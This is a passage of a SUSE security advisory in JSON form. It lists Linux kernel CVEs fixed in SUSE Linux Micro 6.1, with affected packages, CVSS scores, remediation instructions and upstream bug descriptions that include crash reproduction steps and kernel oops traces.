"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
